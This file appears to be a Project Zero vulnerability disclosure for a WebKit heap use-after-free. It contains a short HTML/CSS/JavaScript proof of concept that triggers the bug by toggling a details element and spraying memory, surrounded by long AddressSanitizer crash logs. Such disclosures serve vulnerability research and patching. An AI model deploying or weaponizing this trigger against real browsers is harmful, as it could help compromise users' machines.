#17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)
freed by thread T0 here:
#0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)
#3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)
#4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)
#5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)
#6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)
#7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
#8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
#9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
#10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
#11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
#12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
#13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
#14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
#15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
#16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
#17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
#18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
#19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
#20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
#21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
#22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
#23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
#24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)
#25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)
#26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)
#27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)
#28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)
#29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)
previously allocated by thread T0 here:
#0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)
#7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)
#8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)
#9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)
#10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)
#11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)
#12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)
#15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const
Shadow bytes around the buggy address:
0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd
0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==30692==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1243
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC (note that you might need to refresh a page a couple of times to trigger the bug):
=================================================================
-->
<style>
* { -webkit-flow-into: textarea; }
</style>
<script>
function freememory() {
var a;
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
function go() {
details.open = true;
var o = document.createElement("object");
o.setAttribute("height", "1");
details.open = false;
div.innerHTML = "foo";
freememory();
}
</script>
<body onload=go()>
<div id="div">
<details id="details">
<div>foo</div>
<!--
=================================================================
ASan log:
=================================================================
==29717==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000053b34 at pc 0x000111e799da bp 0x7fff54316880 sp 0x7fff54316878
READ of size 4 at 0x608000053b34 thread T0
==29717==WARNING: invalid path to external symbolizer!
==29717==WARNING: Failed to use and restart external symbolizer!
#0 0x111e799d9 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89d9)
#1 0x111e7d951 in WebCore::Node::hasTagName(WebCore::HTMLQualifiedName const&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc951)
#2 0x111ed2c49 in WebCore::RenderObject::isHR() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x61c49)
#3 0x114308239 in WebCore::RenderBox::avoidsFloats() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2497239)
#4 0x11425511d in WebCore::RenderBlock::avoidsFloats() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23e411d)
#5 0x11428fb94 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241eb94)
#6 0x11428c522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
#7 0x11428a962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
#8 0x1142437d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
#9 0x11438a745 in WebCore::RenderFlowThread::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2519745)
#10 0x1144cb70d in WebCore::RenderNamedFlowThread::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x265a70d)
#11 0x11289a737 in WebCore::FlowThreadController::layoutRenderNamedFlowThreads() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa29737)
#12 0x114645b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)
#13 0x1129c0943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)
#14 0x1129d7530 in WebCore::FrameView::updateLayoutAndStyleIfNeededRecursive() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb66530)
#15 0x10be4d411 in WebKit::TiledCoreAnimationDrawingArea::flushLayers() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x548411)
#16 0x113df7bbe in WebCore::LayerFlushScheduler::layerFlushCallback() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f86bbe)
#17 0x7fffd2f74dd6 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa6dd6)
#18 0x7fffd2f74d46 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa6d46)
#19 0x7fffd2f551e5 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871e5)
#20 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#21 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#22 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#23 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#24 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#25 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#26 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#27 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#28 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#29 0x10b8e856c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#30 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x608000053b34 is located 20 bytes inside of 96-byte region [0x608000053b20,0x608000053b80)
freed by thread T0 here:
#0 0x10e8d9294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x11e466f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x112220a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)
#3 0x11220c892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#4 0x112b6bf0d in WebCore::HTMLDetailsElement::~HTMLDetailsElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcfaf0d)
#5 0x11daed118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)
#6 0x11daeb92f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)
#7 0x11daea3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)
